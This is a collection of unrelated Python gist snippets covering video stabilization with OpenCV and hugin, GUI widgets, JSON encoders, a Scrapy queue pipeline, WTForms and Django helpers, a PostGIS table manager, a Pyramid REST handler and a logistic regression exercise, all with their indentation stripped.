img1, kp1, ds1 = get_surf_kps(img_fns[0])
# match the frame t with t+1
cpoints = []
for i2 in range(1, len(img_fns)):
# get the kps of frame t+1
img2, kp2, ds2 = get_surf_kps(img_fns[i2])
# get the control points
cp1, cp2 = get_pairwise_matches(kp1, ds1, kp2, ds2)
# estimate the homography
H, mask = cv2.findHomography(cp1, cp2, cv2.RANSAC)
mask = mask.squeeze() > 0
# display the matches and homography
if display:
hom_warp_image(img1, cp1, img2, cp2, H, mask)
# filter out the outlier matches
cp1 = cp1[mask]
cp2 = cp2[mask]
# add the control points
cpoints.extend([hsi.ControlPoint(i2 - 1, x1, y1, i2, x2, y2)
for (x1, y1), (x2, y2) in zip(cp1, cp2)])
# next -> cur
img1, kp1, ds1 = img2, kp2, ds2
# write to pto
pano = hsi.Panorama()
pano.readData(hsi.ifstream(proj_file))
pano.setCtrlPoints(cpoints)
pano.writeData(hsi.ofstream(proj_file))
def gen_control_points(proj_file, img_fns, hfov, method="surf"):
""" Generate control points by detecting and matching salient local features
"""
# initialize the pto project
pto_gen(img_fns, hfov=hfov, out_pto=proj_file)
if method == "surf":
# generate the control points with OpenCV's SURF + RANSAC
gen_pairwise_surf_control_points(proj_file, img_fns)
elif method == "cpfind":
# generate the control points with hugin's cpfind
# Note: not a good idea because forces points to be spread over the frame
# which forces points to be on the actor => we don't want that
opts = "-v -n 1" # 1 thread
# RANSAC to estimate homography
opts+= " --ransacmode hom"
#opts+= " --mulitrow" # multirow heuristics
# don't downscale image by 2
opts+= " --fullscale"
# --linearmatchlen 5" # match only pairs (t, t+1), ..., (t, t+n)
opts+= " --linearmatch"
# at most size pts per cell in w x h grid
opts+= " --sieve1width 5 --sieve1height 5 --sieve1size 10"
# at most size pts per cell in w x h grid
opts+= " --sieve2width 5 --sieve2height 5 --sieve2size 1"
cmd = "cpfind {opts} -o {pto} {pto}"
exec_shell(cmd.format(opts=opts, pto=proj_file))
elif method == "sift":
# with autopano-sift-c
cmd = "autopano-sift-c --ransac off --projection 0,{hfov} {pto} {imgs}"
exec_shell(cmd.format(hfov=hfov, pto=proj_file, imgs=' '.join(img_fns)))
else:
raise ValueError("Unknown method %s" % method)
def motion_stabilize_frames(img_fns, hfov=50, out_avi="out.avi"):
""" Motion stabilize a video
Parameters
----------
img_fns: list,
the (ordered) full paths to the video frames
hfov: int, optional, default: 50,
horizontal field of view in degrees
(around 50 is ok for most non-fish-eye cameras)
out_avi: string, optional, default: 'out.avi',
output path to the generated motion-stabilized video
Notes
-----
Uses opencv, hugin and ffmpeg.
"""
# create a temporary directory
tmpd = tempfile.mkdtemp(prefix='tmp_mostab_', dir='.')
# pano tools project file
proj_file = "%s/project.pto" % tmpd
try:
# generate the control points
gen_control_points(proj_file, img_fns, hfov)
# prune the control points TODO necessary?
#cmd = "cpclean -p -o {pto} {pto}"
#exec_shell(cmd.format(pto=proj_file))
# optimise geometric parameters only
cmd = "autooptimiser -p -s -o {pto}.optim.pto {pto}"
# Note: not '-l' as levelling can screw things up
exec_shell(cmd.format(pto=proj_file))
# remapping to create the distorted frames in the full scene plane
cmd = "nona -t 1 -m TIFF_m -o {tmpd}/remapped {pto}.optim.pto" # 1 thread
exec_shell(cmd.format(tmpd=tmpd, pto=proj_file))
# make a video from the tiff frames
cmd = "ffmpeg -y -f image2 -i {tmpd}/remapped%04d.tif -vcodec mjpeg -qscale 1 -an {avi}"
exec_shell(cmd.format(tmpd=tmpd, avi=out_avi), raise_on_err=False)
print "saved {0}".format(out_avi)
finally:
# clean up
shutil.rmtree(tmpd)
sys.stdout.flush()
# =============================================================================
# some visualization function based on opencv
# =============================================================================
def draw_match(img1, img2, p1, p2, mask=None, H=None):
""" Draw the matches found from img1 to img2
"""
h1, w1 = img1.shape[:2]
h2, w2 = img2.shape[:2]
vis = np.zeros((max(h1, h2), w1+w2), np.uint8)
vis[:h1, :w1] = img1
vis[:h2, w1:w1+w2] = img2
vis = cv2.cvtColor(vis, cv2.COLOR_GRAY2BGR)
if H is not None:
corners = np.float32([[0, 0], [w1, 0], [w1, h1], [0, h1]])
corners = np.int32(
cv2.perspectiveTransform(
corners.reshape(1, -1, 2), H).reshape(-1, 2) + (w1, 0))
cv2.polylines(vis, [corners], True, (255, 255, 255))
if mask is None:
mask = np.ones(len(p1), np.bool_)
green = (63, 255, 0)
red = (0, 0, 255)
for (x1, y1), (x2, y2), inlier in zip(np.int32(p1), np.int32(p2), mask):
col = [red, green][inlier]
if inlier:
cv2.line(vis, (x1, y1), (x2+w1, y2), col)
cv2.circle(vis, (x1, y1), 4, col, 2)
cv2.circle(vis, (x2+w1, y2), 4, col, 2)
else:
r = 2
thickness = 3
cv2.line(vis, (x1-r, y1-r), (x1+r, y1+r), col, thickness)
cv2.line(vis, (x1-r, y1+r), (x1+r, y1-r), col, thickness)
cv2.line(vis, (x2+w1-r, y2-r), (x2+w1+r, y2+r), col, thickness)
cv2.line(vis, (x2+w1-r, y2+r), (x2+w1+r, y2-r), col, thickness)
return vis
def hom_warp_image(img1, pts1, img2, pts2, hom, mask):
""" Show keypoint matches and the estimated homography
"""
# warp img2
if img2.ndim == 2:
img2 = img2[:,:,np.newaxis]
wimg2 = np.zeros_like(img2)
for chan in range(img2.shape[2]):
_i2 = np.ascontiguousarray(img2[:, :, chan], dtype="f4")
#wimg2[:,:,chan] = cv2.warpPerspective(_i2, hom, _i2.T.shape)
zz = cv2.warpPerspective(_i2, hom, _i2.T.shape)
zx, zy = np.where(zz > 0)
wimg2[zx, zy, chan] = zz[zx, zy]
wimg2 = wimg2.squeeze()
# warp the matches in img2
wpts2 = cv2.perspectiveTransform(pts2.reshape(1, -1, 2), hom).reshape(-1, 2)
# show the kept matches
vis = draw_match(img1, wimg2, pts1, wpts2, mask, hom)
cv2.imshow("match", vis)
cv2.waitKey()
if __name__ == "__main__":
if len(sys.argv) < 4:
print "usage: video_stabilization.py <out.avi> <frame 1> <frame 2> ..."
sys.exit(0)
out_avi = sys.argv[1]
img_fns = sys.argv[2:]
motion_stabilize_frames(img_fns, out_avi=out_avi)
```
#### File: hard-gists/1558831/snippet.py
```python
from vanilla import *
from NudgeCore import *
class interpolatedNudgeDialog(object):
_title = "Nudge"
_button_1 = 30
_button_2 = 20
_padding = 10
_width = (_button_1 * 3) + (_padding * 2) - 2
_height = (_button_1 * 4) + (_padding * 3) - 2
_nudge = 10
def __init__(self):
self.w = FloatingWindow(
(self._width,
self._height),
self._title)
self.w._up = SquareButton(
(self._button_1 + self._padding - 1,
self._padding,
self._button_1,
self._button_1),
"+",
callback=self._up_callback)
self.w._left = SquareButton(
(self._padding,
self._button_1 + self._padding - 1,
self._button_1,
self._button_1),
"-",
callback=self._left_callback)
self.w._right = SquareButton(
((self._button_1 * 2) + self._padding - 2,
self._button_1 + (self._padding - 1),
self._button_1,
self._button_1),
"+",
callback=self._right_callback)
self.w._down = SquareButton(
(self._button_1 + self._padding - 1,
(self._button_1 * 2) + (self._padding - 2),
self._button_1,
self._button_1),
"-",
callback=self._down_callback)
# nudge size
self.w._nudge_value = EditText(
(self._padding,
(self._button_1 * 3) + (self._padding * 2) + 5,
(self._width / 2) - (self._padding * 1.5),
20),
self._nudge,
sizeStyle='small',
readOnly=True)
self.w._nudge_plus = SquareButton(
(-self._padding - 20,
(self._button_1 * 3) + (self._padding * 2) + 5,
self._button_2,
self._button_2),
'+',
sizeStyle='small',
callback=self.nudge_plus_callback)
self.w._nudge_minus = SquareButton(
(-self._padding - 39,
(self._button_1 * 3) + (self._padding * 2) + 5,
self._button_2,
self._button_2),
'-',
sizeStyle='small',
callback=self.nudge_minus_callback)
# open dialog
self.w.open()
def nudge_minus_callback(self, sender):
_nudge = int(self.w._nudge_value.get()) - 10
if _nudge >= 0:
self._nudge = _nudge
self.w._nudge_value.set(self._nudge)
def nudge_plus_callback(self, sender):
self._nudge = int(self.w._nudge_value.get()) + 10
self.w._nudge_value.set(self._nudge)
def _left_callback(self, sender):
nudgeSelected((-self._nudge, 0))
def _right_callback(self, sender):
nudgeSelected((self._nudge, 0))
def _up_callback(self, sender):
nudgeSelected((0, self._nudge))
def _down_callback(self, sender):
nudgeSelected((0, -self._nudge))
# run
interpolatedNudgeDialog()
```
#### File: hard-gists/1572547/snippet.py
```python
import datetime
import simplejson
import time
from google.appengine.api import users
from ndb import model, query
class ModelEncoder(simplejson.JSONEncoder):
"""
Extends JSONEncoder to add support for NDB Models and query results.
Adds support to simplejson JSONEncoders for NDB Models and query results by
overriding JSONEncoder's default method.
"""
def default(self, obj):
"""Tests the input object, obj, to encode as JSON."""
if hasattr(obj, 'to_dict'):
return getattr(obj, 'to_dict')()
if isinstance(obj, query.Query):
return list(obj)
elif isinstance(obj, datetime.datetime):
return obj.isoformat()
elif isinstance(obj, time.struct_time):
return list(obj)
elif isinstance(obj, users.User):
output = {}
methods = ['nickname', 'email', 'auth_domain']
for method in methods:
output[method] = getattr(obj, method)()
return output
elif isinstance(obj, model.Key):
return obj.get()
return simplejson.JSONEncoder.default(self, obj)
def encode(input):
"""
Encode an input Model object as JSON
Args:
input: A Model object or DB property.
Returns:
A JSON string based on the input object.
Raises:
TypeError: Typically occurs when an input object contains an unsupported
type.
"""
return ModelEncoder().encode(input)
```
#### File: hard-gists/1574231/snippet.py
```python
from scrapy.xlib.pydispatch import dispatcher
from scrapy import signals
from scrapy.exceptions import DropItem
from scrapy.utils.serialize import ScrapyJSONEncoder
from carrot.connection import BrokerConnection
from carrot.messaging import Publisher
from twisted.internet.threads import deferToThread
class MessageQueuePipeline(object):
def __init__(self, host_name, port, userid, password, virtual_host, encoder_class):
self.q_connection = BrokerConnection(hostname=host_name, port=port,
userid=userid, password=password,
virtual_host=virtual_host)
self.encoder = encoder_class()
dispatcher.connect(self.spider_opened, signals.spider_opened)
dispatcher.connect(self.spider_closed, signals.spider_closed)
@classmethod
def from_settings(cls, settings):
host_name = settings.get('BROKER_HOST', 'localhost')
port = settings.get('BROKER_PORT', 5672)
userid = settings.get('BROKER_USERID', "guest")
password = settings.get('BROKER_PASSWORD', "<PASSWORD>")
virtual_host = settings.get('BROKER_VIRTUAL_HOST', "/")
encoder_class = settings.get('MESSAGE_Q_SERIALIZER', ScrapyJSONEncoder)
return cls(host_name, port, userid, password, virtual_host, encoder_class)
def spider_opened(self, spider):
self.publisher = Publisher(connection=self.q_connection,
exchange="", routing_key=spider.name)
def spider_closed(self, spider):
self.publisher.close()
def process_item(self, item, spider):
return deferToThread(self._process_item, item, spider)
def _process_item(self, item, spider):
self.publisher.send({"scraped_data": self.encoder.encode(dict(item))})
return item
```
#### File: hard-gists/1590178/snippet.py
```python
from wtforms.fields import SelectField as BaseSelectField
from wtforms.validators import ValidationError
from wtforms.widgets import HTMLString, html_params, escape
from wtforms.widgets import Select as BaseSelectWidget
__all__ = ('SelectField', 'SelectWidget')
class SelectWidget(BaseSelectWidget):
"""
Add support of choices with ``optgroup`` to the ``Select`` widget.
"""
@classmethod
def render_option(cls, value, label, mixed):
"""
Render option as HTML tag, but not forget to wrap options into
``optgroup`` tag if ``label`` var is ``list`` or ``tuple``.
"""
if isinstance(label, (list, tuple)):
children = []
for item_value, item_label in label:
item_html = cls.render_option(item_value, item_label, mixed)
children.append(item_html)
html = u'<optgroup label="%s">%s</optgroup>'
data = (escape(unicode(value)), u'\n'.join(children))
else:
coerce_func, data = mixed
selected = coerce_func(value) == data
options = {'value': value}
if selected:
options['selected'] = u'selected'
html = u'<option %s>%s</option>'
data = (html_params(**options), escape(unicode(label)))
return HTMLString(html % data)
class SelectField(BaseSelectField):
"""
Add support of ``optgorup``'s' to default WTForms' ``SelectField`` class.
So, next choices would be supported as well::
(
('Fruits', (
('apple', 'Apple'),
('peach', 'Peach'),
('pear', 'Pear')
)),
('Vegetables', (
('cucumber', 'Cucumber'),
('potato', 'Potato'),
('tomato', 'Tomato'),
))
)
"""
widget = SelectWidget()
def iter_choices(self):
"""
We should update how choices are iter to make sure that value from
internal list or tuple should be selected.
"""
for value, label in self.choices:
yield (value, label, (self.coerce, self.data))
def pre_validate(self, form, choices=None):
"""
Don't forget to validate also values from embedded lists.
"""
default_choices = choices is None
choices = choices or self.choices
for value, label in choices:
found = False
if isinstance(label, (list, tuple)):
found = self.pre_validate(form, label)
if found or value == self.data:
return True
if not default_choices:
return False
raise ValidationError(self.gettext(u'Not a valid choice'))
```
#### File: hard-gists/1628838/snippet.py
```python
from django.conf import settings
from django import template
register = template.Library()
class OnlySomethingNode(template.Node):
def __init__(self, nodelist, value='LIVE'):
self.nodelist = nodelist
self.value = value
def render(self, context):
if getattr(settings, 'DEPLOY_ENVIRONMENT', 'DEV') == self.value:
return self.nodelist.render(context)
return ''
@register.tag
def onlylive(parser, token):
nodelist = parser.parse(('endonlylive',))
parser.delete_first_token()
return OnlySomethingNode(nodelist, 'LIVE')
@register.tag
def onlydev(parser, token):
nodelist = parser.parse(('endonlydev',))
parser.delete_first_token()
return OnlySomethingNode(nodelist, 'DEV')
```
#### File: hard-gists/1650115/snippet.py
```python
import pygtk
pygtk.require("2.0")
import gobject
import gtk
from gtk import gdk
class EntryMultiCompletion(gtk.Entry):
def init(self):
gtk.Entry.init(self)
self.completion = gtk.EntryCompletion()
# customize the matching function to match multiple space
# separated words
self.completion.set_match_func(self.match_func, None)
# handle the match-selected signal, raised when a completion
# is selected from the popup
self.completion.connect("match-selected", self.on_completion_match)
self.set_completion(self.completion)
def match_func(self, completion, key_string, iter, data):
model = self.completion.get_model()
# get the completion strings
modelstr = model[iter][0]
# check if the user has typed in a space char,
# get the last word and check if it matches something
if " " in key_string:
last_word = key_string.split()[-1]
return modelstr.startswith(last_word)
# we have only one word typed
return modelstr.startswith(key_string)
def on_completion_match(self, completion, model, iter):
current_text = self.get_text()
# if more than a word has been typed, we throw away the
# last one because we want to replace it with the matching word
# note: the user may have typed only a part of the entire word
# and so this step is necessary
if " " in current_text:
current_text = " ".join(current_text.split()[:-1])
current_text = "%s %s" % (current_text, model[iter][0])
else:
current_text = model[iter][0]
# add the matching word
current_text = "%s %s" % (current_text, model[iter][0])
# set back the whole text
self.set_text(current_text)
# move the cursor at the end
self.set_position(-1)
# stop the event propagation
return True
if __name__ == "main": # register the class as a Gtk widget gobject.type_register(EntryMultiCompletion)
win = gtk.Window()
win.connect("delete-event", gtk.main_quit)
entrycompl = EntryMultiCompletion()
liststore = gtk.ListStore(gobject.TYPE_STRING)
entrycompl.completion.set_model(liststore)
entrycompl.completion.set_text_column(0)
for word in ['abc', 'def', 'ghi', 'jkl', 'mno',
'pqr', 'stu', 'vwx', 'yz']:
liststore.append([word])
win.add(entrycompl)
win.show_all()
gtk.main()
```
#### File: hard-gists/1650418/snippet.py
```python
import time
import psycopg2
import psycopg2.extensions
import logging
log = logging.getLogger(__name__)
from imposm.mapping import UnionView, GeneralizedTable, Mapping
class PostGISDB(object):
def __init__(self, db_conf):
self.db_conf = db_conf
self.srid = int(db_conf['proj'].split(':')[1])
self._insert_stmts = {}
self._connection = None
self._cur = None
@property
def table_prefix(self):
return self.db_conf.prefix.rstrip('_') + '_'
def to_tablename(self, name):
return self.table_prefix + name.lower()
@property
def connection(self):
if not self._connection:
kw = {}
if self.db_conf.port:
kw['port'] = int(self.db_conf.port)
self._connection = psycopg2.connect(
database=self.db_conf.db,
host=self.db_conf.host,
user=self.db_conf.user,
password=self.db_conf.password,
sslmode=self.db_conf.get('sslmode', 'allow'),
**kw
)
self._connection.set_isolation_level(
psycopg2.extensions.ISOLATION_LEVEL_READ_COMMITTED)
return self._connection
def commit(self):
self.connection.commit()
@property
def cur(self):
if self._cur is None:
self._cur = self.connection.cursor()
return self._cur
def insert(self, mapping, insert_data, tries=0):
insert_stmt = self.insert_stmt(mapping)
try:
if tries:
self.reconnect()
self.cur.executemany(insert_stmt, insert_data)
except psycopg2.OperationalError, ex:
if tries >= 8:
log.warn('%s, giving up', ex)
raise
seconds = 2 ** (tries + 1)
log.warn('%s, retry in %d', ex, seconds)
time.sleep(seconds)
self.insert(mapping, insert_data, tries=tries + 1)
except psycopg2.Error, ex:
self.connection.rollback()
for data in insert_data:
try:
self.cur.execute(insert_stmt, data)
except psycopg2.Error, ex:
log.warn('error while importing "%r": %s', data, ex)
self.connection.rollback()
else:
self.connection.commit()
self.connection.commit()
def geom_wrapper(self, geom):
return psycopg2.Binary(geom.wkb)
def reconnect(self):
if self._connection:
try:
self._connection.close()
except psycopg2.InterfaceError:
pass
self._connection = None
self._cur = None
def insert_stmt(self, mapping):
if mapping.name not in self._insert_stmts:
self._insert_stmts[mapping.name] = self._insert_stmt(mapping)
return self._insert_stmts[mapping.name]
def _insert_stmt(self, mapping):
extra_arg_names = extra_args = ''
if mapping.fields:
extra_arg_names = [n for n, t in mapping.fields]
extra_args = ', %s' * len(extra_arg_names)
extra_arg_names = ', ' + ', '.join('"' + name + '"' for name in extra_arg_names)
return """INSERT INTO "%(tablename)s"
(osm_id, type, geometry %(extra_arg_names)s)
VALUES (%%s, %%s, ST_Transform(ST_GeomFromWKB(%%s, 4326), %(srid)s)
%(extra_args)s)
""".strip() % dict(tablename=self.table_prefix + mapping.name, srid=self.srid,
extra_arg_names=extra_arg_names, extra_args=extra_args)
def create_tables(self, mappings):
for mapping in mappings:
self.create_table(mapping)
def create_table(self, mapping):
tablename = self.table_prefix + mapping.name
cur = self.connection.cursor()
cur.execute('SAVEPOINT pre_drop_tables')
try:
cur.execute('DROP TABLE "' + tablename + '" CASCADE')
except psycopg2.ProgrammingError:
cur.execute('ROLLBACK TO SAVEPOINT pre_drop_tables')
extra_fields = ''
for n, t in mapping.fields:
extra_fields += ', "%s" %s ' % (n, t.column_type)
cur.execute("""
CREATE TABLE "%s" (
osm_id INT4 PRIMARY KEY,
type VARCHAR(255)
%s
);
""" % (tablename, extra_fields))
cur.execute("""
SELECT AddGeometryColumn ('', '%(tablename)s', 'geometry',
%(srid)s, '%(pg_geometry_type)s', 2)
""" % dict(tablename=tablename, srid=self.srid,
pg_geometry_type=mapping.geom_type))
cur.execute("""
CREATE INDEX "%(tablename)s_geom" ON "%(tablename)s" USING GIST (geometry)
""" % dict(tablename=tablename))
def swap_tables(self, new_prefix, existing_prefix, backup_prefix):
cur = self.connection.cursor()
self.remove_tables(backup_prefix)
cur.execute('SELECT tablename FROM pg_tables WHERE tablename like %s', (existing_prefix + '%', ))
existing_tables = []
for row in cur:
table_name = row[0]
if table_name.startswith(existing_prefix) and not table_name.startswith((new_prefix, backup_prefix)):
existing_tables.append(table_name)
cur.execute('SELECT indexname FROM pg_indexes WHERE indexname like %s', (existing_prefix + '%', ))
existing_indexes = set()
for row in cur:
index_name = row[0]
if table_name.startswith(existing_prefix) and not index_name.startswith((new_prefix, backup_prefix)):
existing_indexes.add(index_name)
cur.execute('SELECT tablename FROM pg_tables WHERE tablename like %s', (new_prefix + '%', ))
new_tables = []
for row in cur:
table_name = row[0]
new_tables.append(table_name)
cur.execute('SELECT indexname FROM pg_indexes WHERE indexname like %s', (new_prefix + '%', ))
new_indexes = set()
for row in cur:
index_name = row[0]
new_indexes.add(index_name)
if not new_tables:
raise RuntimeError('did not found tables to swap')
for table_name in existing_tables:
rename_to = table_name.replace(existing_prefix, backup_prefix)
cur.execute('ALTER TABLE "%s" RENAME TO "%s"' % (table_name, rename_to))
if table_name + '_geom' in existing_indexes:
cur.execute('ALTER INDEX "%s" RENAME TO "%s"' % (table_name + '_geom', rename_to + '_geom'))
if table_name + '_pkey' in existing_indexes:
cur.execute('ALTER INDEX "%s" RENAME TO "%s"' % (table_name + '_pkey', rename_to + '_pkey'))
#cur.execute('UPDATE geometry_columns SET f_table_name = %s WHERE f_table_name = %s', (rename_to, table_name))
for table_name in new_tables:
rename_to = table_name.replace(new_prefix, existing_prefix)
cur.execute('ALTER TABLE "%s" RENAME TO "%s"' % (table_name, rename_to))
if table_name + '_geom' in new_indexes:
cur.execute('ALTER INDEX "%s" RENAME TO "%s"' % (table_name + '_geom', rename_to + '_geom'))
if table_name + '_pkey' in new_indexes:
cur.execute('ALTER INDEX "%s" RENAME TO "%s"' % (table_name + '_pkey', rename_to + '_pkey'))
#cur.execute('UPDATE geometry_columns SET f_table_name = %s WHERE f_table_name = %s', (rename_to, table_name))
def remove_tables(self, prefix):
cur = self.connection.cursor()
cur.execute('SELECT tablename FROM pg_tables WHERE tablename like %s', (prefix + '%', ))
remove_tables = [row[0] for row in cur]
for table_name in remove_tables:
cur.execute("DROP TABLE %s CASCADE" % (table_name, ))
#cur.execute("DELETE FROM geometry_columns WHERE f_table_name = %s", (table_name, ))
def remove_views(self, prefix):
cur = self.connection.cursor()
cur.execute('SELECT viewname FROM pg_views WHERE viewname like %s', (prefix + '%', ))
remove_views = [row[0] for row in cur]
for view_name in remove_views:
cur.execute('DROP VIEW "%s" CASCADE' % (view_name, ))
#cur.execute("DELETE FROM geometry_columns WHERE f_table_name = %s", (view_name, ))
def create_views(self, mappings, ignore_errors=False):
for mapping in mappings.values():
if isinstance(mapping, UnionView):
PostGISUnionView(self, mapping).create(ignore_errors=ignore_errors)
def create_generalized_tables(self, mappings):
mappings = [m for m in mappings.values() if isinstance(m, GeneralizedTable)]
for mapping in sorted(mappings, key=lambda x: x.name, reverse=True):
PostGISGeneralizedTable(self, mapping).create()
def optimize(self, mappings):
mappings = [m for m in mappings.values() if isinstance(m, (GeneralizedTable, Mapping))]
for mapping in mappings:
table_name = self.to_tablename(mapping.name)
self.optimize_table(table_name, '%s_geom' % table_name)
self.vacuum()
def optimize_table(self, table_name, idx_name):
cur = self.connection.cursor()
print 'Clustering table %s' % table_name
cur.execute('CLUSTER "%s" ON "%s"' % (idx_name, table_name))
self.connection.commit()
def vacuum(self):
old_isolation_level = self.connection.isolation_level
self.reconnect()
self.connection.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
cur = self.connection.cursor()
print 'Vacuum analyze'
cur.execute("VACUUM ANALYZE")
self.connection.set_isolation_level(old_isolation_level)
class PostGISUnionView(object):
def __init__(self, db, mapping):
self.mapping = mapping
self.db = db
self.view_name = db.to_tablename(mapping.name)
def _view_stmt(self):
selects = []
for mapping in self.mapping.mappings:
field_str = ', '.join(self._mapping_fields(mapping))
selects.append("""SELECT osm_id, type, geometry, %s,
'%s' as class from "%s" """ % (
field_str, mapping.classname or mapping.name, self.db.to_tablename(mapping.name)))
selects = '\nUNION ALL\n'.join(selects)
stmt = 'CREATE VIEW "%s" as (\n%s\n)' % (self.view_name, selects)
return stmt
def _geom_table_stmt(self):
stmt = "insert into geometry_columns values ('', 'public', '%s', 'geometry', 2, %d, 'GEOMETRY')" % (
self.view_name, self.db.srid)
return stmt
def _mapping_fields(self, mapping):
mapping_fields = set([n for n, t in mapping.fields])
fields = []
for name, default in self.mapping.fields:
if name in mapping_fields:
fields.append('"' + name + '"')
else:
if default is None:
default = 'null'
elif isinstance(default, basestring):
default = "'%s'" % default
else:
default = str(default)
fields.append(default + ' as "' + name + '"')
return fields
def create(self, ignore_errors):
cur = self.db.connection.cursor()
cur.execute('BEGIN')
try:
cur.execute('SAVEPOINT pre_create_view')
cur.execute('SELECT * FROM pg_views WHERE viewname = %s', (self.view_name, ))
if cur.fetchall():
cur.execute('DROP VIEW %s' % (self.view_name, ))
cur.execute(self._view_stmt())
except psycopg2.ProgrammingError:
cur.execute('ROLLBACK TO SAVEPOINT pre_create_view')
if not ignore_errors:
raise
#cur.execute('SELECT * FROM geometry_columns WHERE f_table_name = %s', (self.view_name, ))
#if cur.fetchall():
# drop old entry to handle changes of SRID
#cur.execute('DELETE FROM geometry_columns WHERE f_table_name = %s', (self.view_name, ))
#cur.execute(self._geom_table_stmt())
class PostGISGeneralizedTable(object):
def __init__(self, db, mapping):
self.db = db
self.mapping = mapping
self.table_name = db.to_tablename(mapping.name)
def _idx_stmt(self):
return 'CREATE INDEX "%s_geom" ON "%s" USING GIST (geometry)' % (
self.table_name, self.table_name)
def _geom_table_stmt(self):
stmt = "insert into geometry_columns values ('', 'public', '%s', 'geometry', 2, %d, 'GEOMETRY')" % (
self.table_name, self.db.srid)
return stmt
def _stmt(self):
fields = ', '.join([n for n, t in self.mapping.fields])
if fields:
fields += ','
if self.mapping.where:
where = ' WHERE ' + self.mapping.where
else:
where = ''
return """CREATE TABLE "%s" AS (SELECT osm_id, type, %s
ST_Simplify(geometry, %f) as geometry from "%s"%s)""" % (
self.table_name, fields, self.mapping.tolerance, self.db.to_tablename(self.mapping.origin.name),
where)
def create(self):
cur = self.db.connection.cursor()
cur.execute('BEGIN')
try:
cur.execute('SAVEPOINT pre_drop_table')
cur.execute('DROP TABLE "%s" CASCADE' % (self.table_name, ))
except psycopg2.ProgrammingError:
cur.execute('ROLLBACK TO SAVEPOINT pre_drop_table')
cur.execute(self._stmt())
cur.execute(self._idx_stmt())
#cur.execute('SELECT * FROM geometry_columns WHERE f_table_name = %s', (self.table_name, ))
#if cur.fetchall():
# drop old entry to handle changes of SRID
#cur.execute('DELETE FROM geometry_columns WHERE f_table_name = %s', (self.table_name, ))
#cur.execute(self._geom_table_stmt())
```
#### File: hard-gists/1653394/snippet.py
```python
from pyramid.config import Configurator
from pyramid.view import view_config
import json
import logging
import datetime
log = logging.getLogger(__name__)
from webservice.model import Session, Machine, LogFile, LogMessage
session = Session.connect('test')
datetime_types = (datetime.time, datetime.date, datetime.datetime)
class JSONEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime_types):
obj = str(obj)
return obj
class BaseRestHandler(object):
MODEL = None
limit = 25
order = None
direction = None
def __init__(self, request):
self.request = request
if not self.order:
self.order = self.MODEL.created_at
self.direction = 'descending'
def __call__(self, *args, **kwargs):
rv = getattr(self, self.request.method)(*args, **kwargs)
return json.dumps(rv, cls=JSONEncoder)
def filter(self):
return ()
def GET(self):
query = session.query(self.MODEL) \
.filter(*self.filter()) \
.limit(self.limit)
query = getattr(query, self.direction)(self.order)
return [i.to_dict(exclude=['mongo_id']) for i in query.all()]
def POST(self):
raise HTTPNotImplemented()
def PUT(self):
raise HTTPNotImplemented()
def DELETE(self):
raise HTTPNotImplemented()
def __fetch_from__(self, src, model, match_key, model_attr):
val = src.get(match_key)
if not val:
raise NotFound('%s not found' % model.__name__)
try:
obj = session.query(model).filter(model_attr == val).one()
except NoResultFound:
raise NotFound('%s %s not found' % (model.__name__, str(val)))
return obj
def __fetch__(self, model, match_key, model_attr):
return self.__fetch_from__(self.request.matchdict,
model,
match_key,
model_attr)
def __post__(self, model, match_key, model_attr):
return self.__fetch_from__(self.request.POST,
model,
match_key,
model_attr)
@view_config(route_name='machines', renderer='string')
class MachinesHandler(BaseRestHandler):
MODEL = Machine
@view_config(route_name='log-files', renderer='string')
class LogFilesHandler(BaseRestHandler):
MODEL = LogMessage
@view_config(route_name='log-messages', renderer='string')
class LogsHandler(BaseRestHandler):
MODEL = LogMessage
def main(global_config, **settings):
config = Configurator(settings=settings)
config.include('pyramid_handlers')
config.add_static_view('static', 'ui:static')
config.add_route('machines', '/machines')
config.add_route('log-files', '/log-files')
config.add_route('log-messages', '/log-messages')
config.scan()
return config.make_wsgi_app()
```
#### File: hard-gists/1688557/snippet.py
```python
from django.shortcuts import render
class RestfulView(object):
allowed_methods = ["GET", "POST"]
def __call__(self, request, *args, **kwargs):
if request.method not in self.allowed_methods or not hasattr(self, request.method):
return self.method_not_allowed(request)
return getattr(self, request.method)(request, *args, **kwargs)
def method_not_allowed(self, request):
return render(request, "405.html", status=405)
```
#### File: hard-gists/1693769/snippet.py
```python
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from scipy import optimize
from numpy import newaxis, r_, c_, mat, e
from numpy.linalg import *
def plotData(X, y):
#pos = (y.ravel() == 1).nonzero()
#neg = (y.ravel() == 0).nonzero()
pos = (y == 1).nonzero()[:1]
neg = (y == 0).nonzero()[:1]
plt.plot(X[pos, 0].T, X[pos, 1].T, 'k+', markeredgewidth=2, markersize=7)
plt.plot(X[neg, 0].T, X[neg, 1].T, 'ko', markerfacecolor='r', markersize=7)
def sigmoid(z):
g = 1. / (1 + e**(-z.A))
return g
def costFunction(theta, X, y):
m = X.shape[0]
predictions = sigmoid(X * c_[theta])
J = 1./m * (-y.T.dot(np.log(predictions)) - (1-y).T.dot(np.log(1 - predictions)))
#grad = 1./m * X.T * (predictions - y)
return J[0][0]##, grad.A
def predict(theta, X):
p = sigmoid(X * c_[theta]) >= 0.5
return p
def plotDecisionBoundary(theta, X, y):
plotData(X[:, 1:3], y)
if X.shape[1] <= 3:
plot_x = r_[X[:,2].min()-2, X[:,2].max()+2]
plot_y = (-1./theta[2]) * (theta[1]*plot_x + theta[0])
plt.plot(plot_x, plot_y)
plt.legend(['Admitted', 'Not admitted', 'Decision Boundary'])
plt.axis([30, 100, 30, 100])
else:
pass
if __name__ == '__main__':
data = np.loadtxt('ex2data1.txt', delimiter=',')
X = mat(c_[data[:, :2]])
y = c_[data[:, 2]]
# ============= Part 1: Plotting
print 'Plotting data with + indicating (y = 1) examples and o ' \
'indicating (y = 0) examples.'
plotData(X, y)
plt.ylabel('Exam 1 score')
plt.xlabel('Exam 2 score')
plt.legend(['Admitted', 'Not admitted'])
plt.show()
raw_input('Press any key to continue\n')
# ============= Part 2: Compute cost and gradient
m, n = X.shape
X = c_[np.ones(m), X]
initial_theta = np.zeros(n+1)
cost, grad = costFunction(initial_theta, X, y), None
print 'Cost at initial theta (zeros): %f' % cost
print 'Gradient at initial theta (zeros):\n%s' % grad
raw_input('Press any key to continue\n')
# ============= Part 3: Optimizing using fminunc
options = {'full_output': True, 'maxiter': 400}
theta, cost, _, _, _ = \
optimize.fmin(lambda t: costFunction(t, X, y), initial_theta, **options)
print 'Cost at theta found by fminunc: %f' % cost
